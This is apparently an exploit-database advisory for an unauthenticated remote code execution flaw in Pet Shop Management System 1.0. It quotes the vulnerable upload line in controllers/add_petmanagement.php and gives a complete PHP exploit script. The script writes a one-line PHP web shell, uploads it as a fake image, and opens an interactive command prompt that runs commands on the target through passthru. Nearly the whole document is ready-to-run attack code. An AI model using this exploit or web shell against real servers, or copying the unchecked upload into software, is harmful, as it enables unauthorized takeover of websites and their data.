Pet Shop Management System version 1.0 suffers from a remote shell upload vulnerability.
627f1d99e1a6128d4f0c6fe3fd446a5b
# Title: Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 28.09.2021
# Author: Mr.Gedik
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14962/petshop-management-system-using-phppdo-oop-full-source-code-complete.html
# Version: 1.0
# https://asciinema.org/a/mjRFsUvshjGIcTsped1PAH8CB
Vulnerable code controllers/add_petmanagement.php
Line 21 - move_uploaded_file($_FILES["images"]["tmp_name"],
$_SERVER['DOCUMENT_ROOT']."/Petshop_Management_System/uploads/" .
addslashes($_FILES["images"]["name"]));
Exploit
#############
<?php
/*
@author:mrgedik
*/
function anim($msg, $time)
{
$msg = str_split($msg);
foreach ($msg as $ms) {
echo $ms;
usleep($time);
}
}
anim("__ __ _____ _ _ _
| \/ | / ____| | (_) |
| \ / |_ __| | __ ___ __| |_| | __
| |\/| | '__| | |_ |/ _ \/ _` | | |/ /
| | | | |_ | |__| | __/ (_| | | <
|_| |_|_(_) \_____|\___|\__,_|_|_|\_\
", 900);
echo PHP_EOL;
while(1)
{
echo anim("Target (http://example.com/path/): ", 800);
$target = trim(fgets(STDIN));
echo PHP_EOL;
if (filter_var($target, FILTER_VALIDATE_URL) === FALSE) {
echo "Not a valid URL".PHP_EOL;
}else {
break;
}
}
@unlink("exp.php");
$fw = fopen("exp.php","a+");
fwrite($fw,'<?php $_POST[m]($_POST[g]); ?>');
fclose($fw);
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_URL, $target."/controllers/add_petmanagement.php");
$fields = [
'images' => new \CurlFile("exp.php", 'image/png', 'exp.php')
];
curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);
$response = curl_exec($ch);
@unlink("exp.php");
if(strstr($response,"success"))
{
while(1)
{
echo anim("root@pwn: ", 800);
$command = trim(fgets(STDIN));
if($command == trim("exit"))
{
exit;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target."/uploads/exp.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"m=passthru&g=".trim($command));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
echo curl_exec($ch);
curl_close ($ch);
}
}else
{
echo anim("Fail", 800);
}
?>